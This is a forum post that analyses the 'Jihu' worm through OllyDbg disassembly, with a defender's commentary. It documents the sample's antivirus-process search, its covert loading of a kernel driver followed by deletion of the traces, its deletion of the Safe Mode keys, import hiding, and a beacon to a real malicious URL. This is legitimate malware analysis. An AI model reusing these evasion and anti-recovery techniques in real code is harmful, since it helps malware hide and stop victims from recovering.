极虎样本分析2 by 零度x[LSG]
本帖最后由 是昔流芳 于 2011-2-11 12:13 编辑
多谢hmily的鼓励,让我有了继续分析的信心。
但是由于实在是没有经验,难免漏掉一些行为,还有很多地方分析得不好,虚心请教大牛们指点~
驱动接触的也实在不多,没有分析驱动~
; ---------------------------------------------------------------------------
; Entry: decide whether this instance runs as the "loader" or as the payload.
; VirtualQuery fills a MEMORY_BASIC_INFORMATION at [ebp-1C]; the dword read
; back afterwards is at [ebp-18], i.e. offset +4 of that struct
; (AllocationBase, judging from the encoded displacements E4/E8). It is
; saved to a global and compared with GetModuleHandleA(NULL), the base of
; the process's main module. The queried Address ([ebp-20]) is set outside
; this excerpt.
; ---------------------------------------------------------------------------
00871B9A|.6A 1C push 1C ; /BufSize = 1C (28.)
00871B9C|.8D45 E4 lea eax, dword ptr ; |
00871B9F|.50 push eax ; |Buffer
00871BA0|.FF75 E0 push dword ptr ; |Address
00871BA3|.FF15 2C918700 call dword ptr [<&KERNEL32.VirtualQue>; \VirtualQuery
00871BA9|.8B45 E8 mov eax, dword ptr ; VirtualQuery result: read back [ebp-18] = AllocationBase of the queried region (analyst: "get memory info")
00871BAC|.A3 38DC8700 mov dword ptr , eax ; stash it in a global for the compare below
00871BB1|.6A 00 push 0 ; /pModule = NULL
00871BB3|.FF15 04918700 call dword ptr [<&KERNEL32.GetModuleH>; \GetModuleHandleA
00871BB9|.3B05 38DC8700 cmp eax, dword ptr ; GetModuleHandleA(NULL) = base of the current main module; compare with the saved AllocationBase
00871BBF|.75 16 jnz short 00871BD7 ; analyst: equal -> run the loader-role code; not equal -> begin the other (payload) path, target 00871BD7 not shown here
; ---------------------------------------------------------------------------
; Spawn thread A (entry 0087539D) with default stack, no parameter, running
; immediately (CreationFlags = 0). The returned handle is not saved here.
; ---------------------------------------------------------------------------
008758E2|.6A 00 push 0 ; /pThreadId = NULL
008758E4|.6A 00 push 0 ; |CreationFlags = 0
008758E6|.6A 00 push 0 ; |pThreadParm = NULL
008758E8|.68 9D538700 push 0087539D ; |ThreadFunction = appmgmts.0087539D
008758ED|.6A 00 push 0 ; |StackSize = 0
008758EF|.6A 00 push 0 ; |pSecurity = NULL
008758F1|.FF15 80918700 call dword ptr [<&KERNEL32.CreateThre>; \CreateThread
008758F7|>33C0 xor eax, eax ; analyst: this CreateThread starts "thread A"; eax is cleared (return value 0) right after
线程A:
查找卡巴和Defender的进程,如果存在就试图躲避杀毒软件查杀,然后以标准方式加载驱动,执行后删除,并且删除了安全模式,最后创建了6个线程。
; ---------------------------------------------------------------------------
; Thread A, step 1: consume "C:\DelInfo.bin".
;   1. CreateFileA("C:\DelInfo.bin", GENERIC_READ|GENERIC_WRITE, share R/W);
;      handle -> [ebp-114]. The open Mode comes from [ebp-118] (set elsewhere).
;   2. ReadFile up to 0x104 (MAX_PATH) bytes into [ebp-110], then CloseHandle.
;   3. DeleteFileA on a path in eax (analyst: the previous loader; presumably
;      the string just read from DelInfo.bin -- the lines that load eax are
;      not in this excerpt).
;   4. DeleteFileA("C:\DelInfo.bin") -- removes the hand-off file itself.
; Defender note: the file is a one-shot hand-off between loader and payload;
; its creation/deletion and the deletion of the original dropper are the
; observable artifacts of this stage.
; ---------------------------------------------------------------------------
00871681|> \6A 00 push 0 ; /hTemplateFile = NULL
00871683|.68 80000000 push 80 ; |Attributes = NORMAL
00871688|.FFB5 E8FEFFFF push dword ptr ; |Mode
0087168E|.6A 00 push 0 ; |pSecurity = NULL
00871690|.6A 03 push 3 ; |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE
00871692|.68 000000C0 push C0000000 ; |Access = GENERIC_READ|GENERIC_WRITE
00871697|.68 08938700 push 00879308 ; |FileName = "C:\DelInfo.bin"
0087169C|.FF15 C4908700 call dword ptr [<&KERNEL32.CreateFile>; \CreateFileA
008716A2|.8985 ECFEFFFF mov dword ptr , eax ; hFile for C:\DelInfo.bin -> [ebp-114]
008717BA|.6A 00 push 0 ; /pOverlapped = NULL
008717BC|.8D45 FC lea eax, dword ptr ; |
008717BF|.50 push eax ; |pBytesRead
008717C0|.68 04010000 push 104 ; |BytesToRead = 104 (260.)
008717C5|.8D85 F0FEFFFF lea eax, dword ptr ; |
008717CB|.50 push eax ; |Buffer
008717CC|.FFB5 ECFEFFFF push dword ptr ; |hFile
008717D2|.FF15 EC908700 call dword ptr [<&KERNEL32.ReadFile>] ; \ReadFile
008717D8|.FFB5 ECFEFFFF push dword ptr ; /read the file (one MAX_PATH-sized chunk into [ebp-110]); now close it
008717DE|.FF15 10918700 call dword ptr [<&KERNEL32.CloseHandl>; \CloseHandle
00871812|.50 |push eax ; /FileName
00871813|.FF15 18918700 |call dword ptr [<&KERNEL32.DeleteFil>; \DeleteFileA
00871819|.83F8 01 |cmp eax, 1 ; analyst: deletes the previous loader; success is tested as eax == 1 (BOOL compared against literal 1, not != 0)
0087182A|> \68 08938700 push 00879308 ; /FileName = "C:\DelInfo.bin"
0087182F|.FF15 18918700 call dword ptr [<&KERNEL32.DeleteFile>; \DeleteFileA
00871835|.8B85 F0FEFFFF mov eax, dword ptr ; C:\DelInfo.bin deleted; reload the first dword of the read buffer [ebp-110]
; ---------------------------------------------------------------------------
; Thread A, step 2: look for a process by image name.
; CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS) -> [ebp-130]; PROCESSENTRY32
; lives at [ebp-128]. Loop: lstrcmpiA(pe.szExeFile, String2) where String2 is
; the function's first argument [ebp+8] and [ebp-104] is [ebp-128]+0x24, the
; szExeFile field (by offset). On a match, [ebp-120] = pe+8 = th32ProcessID
; is saved to [ebp-12C] and the loop exits; otherwise Process32Next continues.
; Analyst: the names searched are Kaspersky and Windows Defender processes
; (the actual strings are passed in by the caller, not visible here).
; ---------------------------------------------------------------------------
00871125|.6A 00 push 0 ; /ProcessID = 0
00871127|.6A 02 push 2 ; |Flags = TH32CS_SNAPPROCESS
00871129|.E8 627D0000 call <jmp.&KERNEL32.CreateToolhelp32S>; \CreateToolhelp32Snapshot
0087112E|.8985 D0FEFFFF mov dword ptr , eax ; hSnapshot -> [ebp-130]
00871134|.8D85 D8FEFFFF lea eax, dword ptr ; &PROCESSENTRY32 at [ebp-128]
0087113A|.50 push eax ; /lppe
0087113B|.FFB5 D0FEFFFF push dword ptr ; |hSnapshot
00871141|.E8 3E7D0000 call <jmp.&KERNEL32.Process32First> ; \Process32First
00871146|>FF75 08 /push dword ptr ; /String2 = caller-supplied process name ([ebp+8])
00871149|.8D85 FCFEFFFF |lea eax, dword ptr ; | [ebp-104] = pe.szExeFile (offset 0x24 into the entry)
0087114F|.50 |push eax ; |String1
00871150|.FF15 F0908700 |call dword ptr [<&KERNEL32.lstrcmpiA>; \lstrcmpiA
00871156|.85C0 |test eax, eax ; case-insensitive compare; analyst: searching for Kaspersky / Defender
00871158|.75 0E |jnz short 00871168 ; no match -> advance to next process
0087115A|.8B85 E0FEFFFF |mov eax, dword ptr ; match: eax = pe.th32ProcessID ([ebp-128]+8)
00871160|.8985 D4FEFFFF |mov dword ptr , eax ; remember the PID at [ebp-12C]
00871166|.EB 16 |jmp short 0087117E ; stop scanning on first hit
00871168|>8D85 D8FEFFFF |lea eax, dword ptr
0087116E|.50 |push eax ; /lppe
0087116F|.FFB5 D0FEFFFF |push dword ptr ; |hSnapshot
00871175|.E8 107D0000 |call <jmp.&KERNEL32.Process32Next> ; \Process32Next
0087117A|.85C0 |test eax, eax
0087117C|.^ 75 C8 \jnz short 00871146 ; loop while entries remain
0087117E|>FFB5 D0FEFFFF push dword ptr ; /hObject
00871184|.FF15 10918700 call dword ptr [<&KERNEL32.CloseHandl>; \CloseHandle
; ---------------------------------------------------------------------------
; Thread A, step 3: collect directory paths into two global buffers.
;   GetTempPathA(0x104, 0087D418)        -> %TEMP% (used for the driver drop)
;   GetSystemDirectoryA(0087D520, 0x104) -> %SystemRoot%\system32
; ---------------------------------------------------------------------------
008754D7 .68 18D48700 push 0087D418 ; /Buffer = appmgmts.0087D418
008754DC .68 04010000 push 104 ; |BufSize = 104 (260.)
008754E1 .FF15 4C918700 call dword ptr [<&KERNEL32.GetTempPat>; \GetTempPathA
008754E7 .68 04010000 push 104 ; /temp directory obtained; next call's BufSize
008754FB .68 04010000 push 104 ; /BufSize = 104 (260.)
00875500 .68 20D58700 push 0087D520 ; |Buffer = appmgmts.0087D520
00875505 .FF15 B0908700 call dword ptr [<&KERNEL32.GetSystemD>; \GetSystemDirectoryA
0087550B .68 04010000 push 104 ; /system directory obtained; next call's BufSize
; ---------------------------------------------------------------------------
; Thread A, step 4: extract an embedded resource and write it to disk.
; Args: [ebp+8] = output path, [ebp+C] = hModule holding the resource,
;       [ebp+10] = resource ordinal (word), [ebp+14] = file attributes.
;   1. LoadResource is resolved at runtime via GetModuleHandleA("kernel32.dll")
;      + GetProcAddress and kept in [ebp-8] (it is not called through the
;      import table -- an import-hiding detail worth noting for static triage).
;   2. FindResourceA(hModule, ordinal, "FILE") -> [ebp-20];
;      SizeofResource -> [ebp-4]; LoadResource -> [ebp-44].
;   3. CreateFileA(path, GENERIC_READ|GENERIC_WRITE, CREATE_ALWAYS) -> [ebp-18].
; Olly showed the path as %TEMP%\Forter.sys in this session; the write of the
; resource bytes into the file is outside this excerpt.
; ---------------------------------------------------------------------------
00871536 .50 push eax ; /ProcNameOrOrdinal = "LoadResource"
00871537 .68 F0928700 push 008792F0 ; |/pModule = "kernel32.dll"
0087153C .FF15 04918700 call dword ptr [<&KERNEL32.GetModuleH>; |\GetModuleHandleA
00871542 .50 push eax ; |hModule
00871543 .FF15 F4908700 call dword ptr [<&KERNEL32.GetProcAdd>; \GetProcAddress
00871549 .8945 F8 mov dword ptr , eax ; [ebp-8] = address of kernel32!LoadResource (resolved dynamically)
0087154C .68 00938700 push 00879300 ; /ResourceType = "FILE"
00871551 .0FB745 10 movzx eax, word ptr ; | resource id: zero-extended 16-bit ordinal from [ebp+10]
00871555 .50 push eax ; |ResourceName
00871556 .FF75 0C push dword ptr ; |hModule
00871559 .FF15 C8908700 call dword ptr [<&KERNEL32.FindResour>; \FindResourceA
0087155F .8945 E0 mov dword ptr , eax ; hResource -> [ebp-20]
00871562 .FF75 E0 push dword ptr ; /hResource
00871565 .FF75 0C push dword ptr ; |hModule
00871568 .FF15 E8908700 call dword ptr [<&KERNEL32.SizeofReso>; \SizeofResource
0087156E .8945 FC mov dword ptr , eax ; resource size -> [ebp-4]
00871571 .FF75 E0 push dword ptr ; hResource
00871574 .FF75 0C push dword ptr ; hModule
00871577 .FF55 F8 call dword ptr ; kernel32.LoadResource via the pointer saved in [ebp-8]
0087157A .8945 BC mov dword ptr , eax ; pointer to the loaded resource -> [ebp-44]
008715D3 .6A 00 push 0 ; /hTemplateFile = NULL
008715D5 .FF75 14 push dword ptr ; |Attributes
008715D8 .6A 02 push 2 ; |Mode = CREATE_ALWAYS
008715DA .6A 00 push 0 ; |pSecurity = NULL
008715DC .6A 03 push 3 ; |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE
008715DE .68 000000C0 push C0000000 ; |Access = GENERIC_READ|GENERIC_WRITE
008715E3 .FF75 08 push dword ptr ; |FileName = "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Forter.sys"
008715E6 .FF15 C4908700 call dword ptr [<&KERNEL32.CreateFile>; \CreateFileA
008715EC .8945 E8 mov dword ptr , eax ; hFile for the dropped %TEMP%\Forter.sys -> [ebp-18] (CREATE_ALWAYS overwrites any existing file)
; ---------------------------------------------------------------------------
; Thread A, step 5: load the dropped driver through the Service Control
; Manager ("standard" driver load, per the analyst).
;   OpenSCManagerA(NULL, NULL, 0F003F = SC_MANAGER_ALL_ACCESS) -> [ebp-4]
;   CreateServiceA(hSCM, "Forter", "Forter", SERVICE_ALL_ACCESS,
;                  SERVICE_KERNEL_DRIVER, SERVICE_DEMAND_START,
;                  SERVICE_ERROR_NORMAL, BinaryPathName=[ebp+8], ...) -> [ebp-8]
;   StartServiceA(hService, 0, NULL); CloseServiceHandle x2.
; Defender note: service creation of a kernel driver named "Forter" with a
; %TEMP% image path is the key event of this stage (Event ID 7045 / SCM
; auditing); the service key and file are removed right after (see below), so
; the on-disk trace is short-lived.
; ---------------------------------------------------------------------------
0087533A|.68 3F000F00 push 0F003F ; dwDesiredAccess = SC_MANAGER_ALL_ACCESS
0087533F|.6A 00 push 0 ; lpDatabaseName = NULL
00875341|.6A 00 push 0 ; lpMachineName = NULL (local machine)
00875343|.FF15 18908700 call dword ptr [<&ADVAPI32.OpenSCMana>;advapi32.OpenSCManagerA
00875349|.8945 FC mov dword ptr , eax ; hSCManager -> [ebp-4]
0087534C|.6A 00 push 0 ; /Password = NULL
0087534E|.6A 00 push 0 ; |ServiceStartName = NULL
00875350|.6A 00 push 0 ; |pDependencies = NULL
00875352|.6A 00 push 0 ; |pTagId = NULL
00875354|.6A 00 push 0 ; |LoadOrderGroup = NULL
00875356|.FF75 08 push dword ptr ; |BinaryPathName (function argument; analyst: the dropped Forter.sys)
00875359|.6A 01 push 1 ; |ErrorControl = SERVICE_ERROR_NORMAL
0087535B|.6A 03 push 3 ; |StartType = SERVICE_DEMAND_START
0087535D|.6A 01 push 1 ; |ServiceType = SERVICE_KERNEL_DRIVER
0087535F|.68 FF010F00 push 0F01FF ; |DesiredAccess = SERVICE_ALL_ACCESS
00875364|.68 44988700 push 00879844 ; |DisplayName = "Forter"
00875369|.68 44988700 push 00879844 ; |ServiceName = "Forter"
0087536E|.FF75 FC push dword ptr ; |hManager
00875371|.FF15 20908700 call dword ptr [<&ADVAPI32.CreateServ>; \CreateServiceA
00875377|.8945 F8 mov dword ptr , eax ; hService -> [ebp-8]; note: no check for a NULL handle before StartServiceA
0087537A|.6A 00 push 0 ; lpServiceArgVectors = NULL
0087537C|.6A 00 push 0 ; dwNumServiceArgs = 0
0087537E|.FF75 F8 push dword ptr ; hService
00875381|.FF15 24908700 call dword ptr [<&ADVAPI32.StartServi>;advapi32.StartServiceA
00875387|.FF75 F8 push dword ptr ; driver loaded via SCM (analyst: "standard way"); now release hService
0087538A|.FF15 00908700 call dword ptr [<&ADVAPI32.CloseServi>;advapi32.CloseServiceHandle
00875390|.FF75 FC push dword ptr ; release hSCManager
00875393|.FF15 00908700 call dword ptr [<&ADVAPI32.CloseServi>;advapi32.CloseServiceHandle
; ---------------------------------------------------------------------------
; Thread A, step 6: erase the driver's footprint after it has been started.
;   SHDeleteKeyA(HKEY_LOCAL_MACHINE, subkey in eax) -- called through a
;   function pointer in [ebp-930] rather than the import table; analyst:
;   the SYSTEM\CurrentControlSet\Services\<service> subkey.
;   DeleteFileA(path at [ebp-B40]) -- analyst: %TEMP%\Forter.sys.
; The driver stays loaded in the kernel while its service key and image file
; disappear, so memory/driver-list inspection is the remaining detection point.
; ---------------------------------------------------------------------------
0087559E .50 push eax ; pszSubKey (built at runtime, not shown)
0087559F .68 02000080 push 80000002 ; hKey = HKEY_LOCAL_MACHINE
008755A4 .FF95 D0F6FFFF call dword ptr ;shlwapi.SHDeleteKeyA via pointer in [ebp-930]
008755AA .8D85 C0F4FFFF lea eax, dword ptr ; Services subkey removed (analyst); eax = path buffer at [ebp-B40]
008755B0 .50 push eax ; /FileName
008755B1 .FF15 18918700 call dword ptr [<&KERNEL32.DeleteFile>; \DeleteFileA
008755B7 .68 04010000 push 104 ; /deletes C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Forter.sys (analyst); 0x104 is the next call's BufSize
; ---------------------------------------------------------------------------
; Thread A, step 7: set a service's Start value for persistence.
;   RegOpenKeyExA(HKLM, subkey at [ebp-488], 0, 0x2001F) -> hKey in [ebp-44]
;   RegSetValueExA(hKey, "Start", 0, REG_DWORD, &[ebp+10], 4); RegCloseKey.
; Analyst observed the subkey as SYSTEM\CurrentControlSet\Services\LOADDLL
; and the value as 2 (SERVICE_AUTO_START). NOTE(review): the service name
; matches the process hosting this DLL during analysis (OllyDbg's
; LOADDLL.EXE, see GetModuleFileNameA later), so on a real infection the
; key name presumably follows the actual host name -- confirm before using
; it as an indicator. The value data itself comes from the caller ([ebp+10]).
; ---------------------------------------------------------------------------
00871AA0|.50 push eax ; /pHandle
00871AA1|.68 1F000200 push 2001F ; |Access = KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|20000
00871AA6|.6A 00 push 0 ; |Reserved = 0
00871AA8|.8D85 78FBFFFF lea eax, dword ptr ; | subkey string at [ebp-488], built earlier
00871AAE|.50 push eax ; |Subkey
00871AAF|.68 02000080 push 80000002 ; |hKey = HKEY_LOCAL_MACHINE
00871AB4|.FF15 0C908700 call dword ptr [<&ADVAPI32.RegOpenKey>; \RegOpenKeyExA
00871ABA|.6A 04 push 4 ; /opens SYSTEM\CurrentControlSet\Services\LOADDLL (analyst); 4 = BufSize of the DWORD below
00871ABC|.8D45 10 lea eax, dword ptr ; | &[ebp+10] = caller-supplied value data
00871ABF|.50 push eax ; |Buffer
00871AC0|.6A 04 push 4 ; |ValueType = REG_DWORD
00871AC2|.6A 00 push 0 ; |Reserved = 0
00871AC4|.68 80948700 push 00879480 ; |ValueName = "Start"
00871AC9|.FF75 BC push dword ptr ; |hKey
00871ACC|.FF15 08908700 call dword ptr [<&ADVAPI32.RegSetValu>; \RegSetValueExA
00871AD2|.FF75 BC push dword ptr ; /Start set to 2 = SERVICE_AUTO_START (analyst); now close the key
00871AD5|.FF15 10908700 call dword ptr [<&ADVAPI32.RegCloseKe>; \RegCloseKey
; ---------------------------------------------------------------------------
; Thread A, step 8: spawn worker threads A1 (entry 00875163) and A2
; (entry 0087374A). Both get no parameter, default stack, run immediately;
; neither handle is kept.
; ---------------------------------------------------------------------------
0087586E > \6A 00 push 0 ; /pThreadId = NULL
00875870 .6A 00 push 0 ; |CreationFlags = 0
00875872 .6A 00 push 0 ; |pThreadParm = NULL
00875874 .68 63518700 push 00875163 ; |ThreadFunction = appmgmts.00875163
00875879 .6A 00 push 0 ; |StackSize = 0
0087587B .6A 00 push 0 ; |pSecurity = NULL
0087587D .FF15 80918700 call dword ptr [<&KERNEL32.CreateThre>; \CreateThread
00875883 .6A 00 push 0 ; /thread A1 created; this 0 is pThreadId of the next call
00875885 .6A 00 push 0 ; |CreationFlags = 0
00875887 .6A 00 push 0 ; |pThreadParm = NULL
00875889 .68 4A378700 push 0087374A ; |ThreadFunction = appmgmts.0087374A
0087588E .6A 00 push 0 ; |StackSize = 0
00875890 .6A 00 push 0 ; |pSecurity = NULL
00875892 .FF15 80918700 call dword ptr [<&KERNEL32.CreateThre>; \CreateThread
00875898 .8D85 D8FEFFFF lea eax, dword ptr ; thread A2 created; eax = local buffer at [ebp-128] for what follows
; ---------------------------------------------------------------------------
; Thread A, step 9: spawn thread A3 (entry 00878CAB), then delete the
; SafeBoot control keys so the machine can no longer boot into Safe Mode.
;   SHDeleteKeyA(HKLM, 00879B40)  -- string not shown; presumably
;                                     ...\Control\SafeBoot\Minimal (analyst
;                                     says "deletes safe mode")
;   SHDeleteKeyA(HKLM, "SYSTEM\CurrentControlSet\Control\SafeBoot\Network")
; Defender note: deletion of HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\*
; is a high-signal registry event; restoring these keys is part of cleanup.
; ---------------------------------------------------------------------------
0087694E|.6A 00 push 0 ; /pThreadId = NULL
00876950|.6A 00 push 0 ; |CreationFlags = 0
00876952|.6A 00 push 0 ; |pThreadParm = NULL
00876954|.68 AB8C8700 push 00878CAB ; |ThreadFunction = appmgmts.00878CAB
00876959|.6A 00 push 0 ; |StackSize = 0
0087695B|.6A 00 push 0 ; |pSecurity = NULL
0087695D|.FF15 80918700 call dword ptr [<&KERNEL32.CreateThre>; \CreateThread
00876963|.68 409B8700 push 00879B40 ; /thread A3 created; this is pszSubKey for the first SHDeleteKeyA (string at 00879B40, not shown)
00876968|.68 02000080 push 80000002 ; |hKey = HKEY_LOCAL_MACHINE
0087696D|.FF15 F4918700 call dword ptr [<&SHLWAPI.SHDeleteKey>; \SHDeleteKeyA
00876973|.68 749B8700 push 00879B74 ; /SubKey = "SYSTEM\CurrentControlSet\Control\SafeBoot\Network"
00876978|.68 02000080 push 80000002 ; |hKey = HKEY_LOCAL_MACHINE
0087697D|.FF15 F4918700 call dword ptr [<&SHLWAPI.SHDeleteKey>; \SHDeleteKeyA
00876983|.833D 50B58700>cmp dword ptr , -1 ; Safe Mode keys deleted (analyst); then test a global against -1
; ---------------------------------------------------------------------------
; Thread A, step 10: read the hosting executable into memory.
;   GetModuleFileNameA([ebp+8], buf at [ebp-118], 0x104)
;   CreateFileA(buf, GENERIC_READ, FILE_SHARE_READ, OPEN_EXISTING) -> [ebp-C]
;   GetFileSize(hFile, NULL) -> [ebp-8]
;   ReadFile(hFile, [ebp-11C], size, &[ebp-4], NULL); CloseHandle.
; In this session the module was OllyDbg's LOADDLL.EXE (the sample is a DLL
; loaded by the debugger); on a real host it would be whatever process loads
; the DLL. What the in-memory copy is used for is outside this excerpt
; (presumably related to the file-infection thread A4).
; ---------------------------------------------------------------------------
00871C0B|.68 04010000 push 104 ; /BufSize = 104 (260.)
00871C10|.8D85 E8FEFFFF lea eax, dword ptr ; |
00871C16|.50 push eax ; |PathBuffer
00871C17|.FF75 08 push dword ptr ; |hModule
00871C1A|.FF15 00918700 call dword ptr [<&KERNEL32.GetModuleF>; \GetModuleFileNameA
00871C20|.83A5 E0FEFFFF>and dword ptr , 0 ; path of the exe that loaded this module obtained (analyst); zero a local at [ebp-120]
00871C3F|.6A 00 |push 0 ; /hTemplateFile = NULL
00871C41|.6A 00 |push 0 ; |Attributes = 0
00871C43|.6A 03 |push 3 ; |Mode = OPEN_EXISTING
00871C45|.6A 00 |push 0 ; |pSecurity = NULL
00871C47|.6A 01 |push 1 ; |ShareMode = FILE_SHARE_READ
00871C49|.68 00000080 |push 80000000 ; |Access = GENERIC_READ
00871C4E|.8D85 E8FEFFFF |lea eax, dword ptr ; |
00871C54|.50 |push eax ; |FileName = "C:\tools\OllyICE\LOADDLL.EXE"
00871C55|.FF15 C4908700 |call dword ptr [<&KERNEL32.CreateFil>; \CreateFileA
00871C5B|.8945 F4 |mov dword ptr , eax ; hFile of the host exe -> [ebp-C]
00871C70|> \6A 00 push 0 ; /pFileSizeHigh = NULL
00871C72|.FF75 F4 push dword ptr ; |hFile
00871C75|.FF15 24918700 call dword ptr [<&KERNEL32.GetFileSiz>; \GetFileSize
00871C7B|.8945 F8 mov dword ptr , eax ; file size (low dword) -> [ebp-8]
00871CEF|.6A 00 push 0 ; /pOverlapped = NULL
00871CF1|.8D45 FC lea eax, dword ptr ; |
00871CF4|.50 push eax ; |pBytesRead
00871CF5|.FF75 F8 push dword ptr ; |BytesToRead = whole file
00871CF8|.FFB5 E4FEFFFF push dword ptr ; |Buffer (allocated between 00871C7E and 00871CEF, not shown)
00871CFE|.FF75 F4 push dword ptr ; |hFile
00871D01|.FF15 EC908700 call dword ptr [<&KERNEL32.ReadFile>] ; \ReadFile
00871D07|.FF75 F4 push dword ptr ; /entire host exe read into memory; hFile pushed for CloseHandle
; ---------------------------------------------------------------------------
; Thread A, step 11: spawn threads A4 (00876324), A5 (00878A98) and A6
; (008785DC). CreateThread is called through a pointer in [ebp-4] here,
; not through the import table. A6 is the only one that receives a
; parameter (lpParameter = 1). After each spawn a global is compared with 0
; (the conditional that follows is not shown).
; ---------------------------------------------------------------------------
00876B05|.6A 00 push 0 ; lpThreadId = NULL
00876B07|.6A 00 push 0 ; dwCreationFlags = 0
00876B09|.6A 00 push 0 ; lpParameter = NULL
00876B0B|.68 24638700 push 00876324 ; lpStartAddress = thread A4
00876B10|.6A 00 push 0 ; dwStackSize = 0
00876B12|.6A 00 push 0 ; lpThreadAttributes = NULL
00876B14|.FF55 FC call dword ptr ;kernel32.CreateThread via pointer in [ebp-4]
00876B17|>833D 84C68700>cmp dword ptr , 0 ; thread A4 created; check global 0087C684
00876B20|.6A 00 push 0 ; lpThreadId = NULL
00876B22|.6A 00 push 0 ; dwCreationFlags = 0
00876B24|.6A 00 push 0 ; lpParameter = NULL
00876B26|.68 988A8700 push 00878A98 ; lpStartAddress = thread A5
00876B2B|.6A 00 push 0 ; dwStackSize = 0
00876B2D|.6A 00 push 0 ; lpThreadAttributes = NULL
00876B2F|.FF55 FC call dword ptr ;kernel32.CreateThread via pointer in [ebp-4]
00876B32|>833D 88C68700>cmp dword ptr , 0 ; thread A5 created; check global 0087C688
00876B3B|.6A 00 push 0 ; lpThreadId = NULL
00876B3D|.6A 00 push 0 ; dwCreationFlags = 0
00876B3F|.6A 01 push 1 ; lpParameter = 1 (only A6 gets an argument)
00876B41|.68 DC858700 push 008785DC ; lpStartAddress = thread A6
00876B46|.6A 00 push 0 ; dwStackSize = 0
00876B48|.6A 00 push 0 ; lpThreadAttributes = NULL
00876B4A|.FF55 FC call dword ptr ;kernel32.CreateThread via pointer in [ebp-4]
00876B4D|>833D 8CC68700>cmp dword ptr , 0 ; thread A6 created; check global 0087C68C
线程A1:
用IE打开 http://tj.nba1001.net:7777/tj/mac.html ,10秒后关闭
; ---------------------------------------------------------------------------
; Thread A1: launch a browser on a tracking URL, then kill it after 10 s.
;   CreateProcessA(NULL, cmdline at [ebp-620], NULL, NULL, TRUE,
;                  CREATE_DEFAULT_ERROR_MODE, NULL, NULL, &si, &pi)
;   on success: CloseHandle(pi.hThread); Sleep(10000);
;               TerminateProcess(pi.hProcess, 0); CloseHandle(pi.hProcess).
; Analyst: the command line opens IE on http://tj.nba1001.net:7777/tj/mac.html
; (the URL string is built outside this excerpt). Defender note: a short-lived
; browser child of an unrelated process hitting port 7777 is the observable.
; ---------------------------------------------------------------------------
00875224|.50 push eax ; /pProcessInfo
00875225|.8D85 98F9FFFF lea eax, dword ptr ; |
0087522B|.50 push eax ; |pStartupInfo
0087522C|.6A 00 push 0 ; |CurrentDir = NULL
0087522E|.6A 00 push 0 ; |pEnvironment = NULL
00875230|.68 00000004 push 4000000 ; |CreationFlags = CREATE_DEFAULT_ERROR_MODE
00875235|.6A 01 push 1 ; |InheritHandles = TRUE
00875237|.6A 00 push 0 ; |pThreadSecurity = NULL
00875239|.6A 00 push 0 ; |pProcessSecurity = NULL
0087523B|.8D85 E0F9FFFF lea eax, dword ptr ; |
00875241|.50 push eax ; |CommandLine
00875242|.6A 00 push 0 ; |ModuleFileName = NULL
00875244|.FF15 3C918700 call dword ptr [<&KERNEL32.CreateProc>; \CreateProcessA
0087524A|.83F8 01 cmp eax, 1 ; IE launched on http://tj.nba1001.net:7777/tj/mac.html (analyst); BOOL tested as == 1
0087524D|. /75 31 jnz short 00875280 ; launch failed -> skip the cleanup
0087524F|. |FFB5 ECFEFFFF push dword ptr ; /hObject = thread handle (per Olly labels)
00875255|. |FF15 10918700 call dword ptr [<&KERNEL32.CloseHandl>; \CloseHandle
0087525B|. |68 10270000 push 2710 ; /Timeout = 10000. ms
00875260|. |FF15 E4908700 call dword ptr [<&KERNEL32.Sleep>] ; \Sleep
00875266|. |6A 00 push 0 ; /10-second delay done; ExitCode = 0 for TerminateProcess
00875268|. |FFB5 E8FEFFFF push dword ptr ; |hProcess
0087526E|. |FF15 B4908700 call dword ptr [<&KERNEL32.TerminateP>; \TerminateProcess
00875274|. |FFB5 E8FEFFFF push dword ptr ; /browser killed; release hProcess
0087527A|. |FF15 10918700 call dword ptr [<&KERNEL32.CloseHandl>; \CloseHandle
线程A2:
; ---------------------------------------------------------------------------
; Thread A2, step 1: WSAStartup(2.2) then loop on getaddrinfo("www.baidu.com")
; until it succeeds -- a connectivity probe (analyst's reading; the loop
; body after the test is not shown).
; ---------------------------------------------------------------------------
00871B08|.50 push eax ; /pWSAData
00871B09|.68 02020000 push 202 ; |RequestedVersion = 202 (2.2.)
00871B0E|.FF15 44928700 call dword ptr [<&WS2_32.#115>] ; \WSAStartup
00871B14|>8D85 68FEFFFF /lea eax, dword ptr ; loop head: &result (addrinfo**) at [ebp-198]
00871B1A|.50 |push eax ; ppResult
00871B1B|.6A 00 |push 0 ; pHints = NULL
00871B1D|.6A 00 |push 0 ; pServiceName = NULL
00871B1F|.68 88948700 |push 00879488 ;ASCII "www.baidu.com"
00871B24|.FF15 48928700 |call dword ptr [<&WS2_32.getaddrinfo>;ws2_32.getaddrinfo
00871B2A|.85C0 |test eax, eax ; 0 = resolved; analyst: resolves baidu, presumably to test network reachability
; ---------------------------------------------------------------------------
; Thread A2, step 2: load Wininet.dll at runtime and resolve the HTTP client
; API by name, storing each address in a global:
;   0087DC4C InternetOpenA        0087DC50 InternetOpenUrlA
;   0087DC54 HttpQueryInfoA       0087DC58 InternetReadFileExA
;   0087DC5C InternetCloseHandle  0087DC60 InternetSetStatusCallback
; None of these appear in the import table (all via GetProcAddress), so the
; HTTP download capability is invisible to import-based static triage.
; ---------------------------------------------------------------------------
00872D1D|.68 80958700 push 00879580 ; /FileName = "Wininet.dll"
00872D22|.FF15 40918700 call dword ptr [<&KERNEL32.LoadLibrar>; \LoadLibraryA
00872D28|.8945 F4 mov dword ptr , eax ; hWininet -> [ebp-C]
00872D2B|.68 8C958700 push 0087958C ; /ProcNameOrOrdinal = "InternetOpenA"
00872D30|.FF75 F4 push dword ptr ; |hModule
00872D33|.FF15 F4908700 call dword ptr [<&KERNEL32.GetProcAdd>; \GetProcAddress
00872D39|.A3 4CDC8700 mov dword ptr , eax ; -> 0087DC4C
00872D3E|.68 9C958700 push 0087959C ; /ProcNameOrOrdinal = "InternetOpenUrlA"
00872D43|.FF75 F4 push dword ptr ; |hModule
00872D46|.FF15 F4908700 call dword ptr [<&KERNEL32.GetProcAdd>; \GetProcAddress
